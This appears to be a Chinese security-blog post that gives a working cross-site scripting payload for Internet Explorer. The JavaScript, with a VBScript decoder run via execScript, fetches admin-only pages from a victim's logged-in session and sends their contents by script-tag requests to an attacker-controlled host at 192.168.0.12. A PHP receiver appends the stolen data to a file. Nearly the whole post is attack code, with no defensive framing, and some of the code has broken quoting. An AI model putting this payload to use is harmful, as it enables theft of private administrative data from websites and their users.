xss后台目录文件内容读取(只适用IE)
vbs小铺
js:
execScript(unescape(Function%20bytes2BSTR%28vIn%29%0D%0A%20%20%20%20%20strReturn%20%3D%20%22%22%0D%0A%20%20%20%20%20For%20i%20%3D%201%20To%20LenB%28vIn%29%0D%0A%20%20%20%20%20%20%20%20%20ThisCharCode%20%3D%20AscB%28MidB%28vIn%2Ci%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20If%20ThisCharCode%20%3C%20%26H80%20Then%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28ThisCharCode%29%0D%0A%20%20%20%20%20%20%20%20%20Else%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20NextCharCode%20%3D%20AscB%28MidB%28vIn%2Ci+1%2C1%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20Chr%28CLng%28ThisCharCode%29%20*%20%26H100%20+%20CInt%28NextCharCode%29%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20i%20%3D%20i%20+%201%0D%0A%20%20%20%20%20%20%20%20%20End%20If%0D%0A%20%20%20%20%20Next%0D%0A%20%20%20%20%20bytes2BSTR%20%3D%20strReturn%0D%0AEnd%20Function),VBScript);
function getReaded(usr) {
var filex="http://192.168.0.12/style.php?key="+mycars[n]+" "+" "+usr+" "+" ";
addFile(filex,-1);
}
function addFile(str,i){var x=document.createElement(SCRIPT);
x.src=str;
document.insertBefore(x,document.getElementsByTagName(*)[0]);}
xmlUrl=GetxmlUrlObject()
if (xmlUrl==null)
{
alert ("您的浏览器不支持AJAX!");
}
function GetxmlUrlObject()
{
var xmlUrl=null;
try
{
// Firefox, Opera 8.0+, Safari
xmlUrl=new xmlUrlRequest();
}
catch (e)
{
// Internet Explorer
try
{
xmlUrl=new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
xmlUrl=new ActiveXObject("Microsoft.XMLHTTP");
}
}
return xmlUrl;
}
var mycars = new Array();
mycars[0] = "admin/1.php";
mycars[1] = "admin/2.php";;
var b = new Array();for (n=0;n<mycars.length ;n++ )
{xmlUrl.Open(GET,mycars[n],false);
xmlUrl.setRequestHeader("Content-type","application/x-www-form-urlencoded;");
xmlUrl.Send(null);
if (xmlUrl.readyState == 4){
if (xmlUrl.status == 200){
b[n]=bytes2BSTR(xmlUrl.responseBody);
//alert(b[n]);
getReaded(b[n]);
}
}
}
php:
<?php
header(Content-Type:text/html;charset=GB2312);
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|.{4};|d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}$file="news.html";
$_GET[key]=unescape($_GET[key]);fputs(fopen($file,a+),$_GET[key]);
?>
补充:综合编程 , 安全编程 ,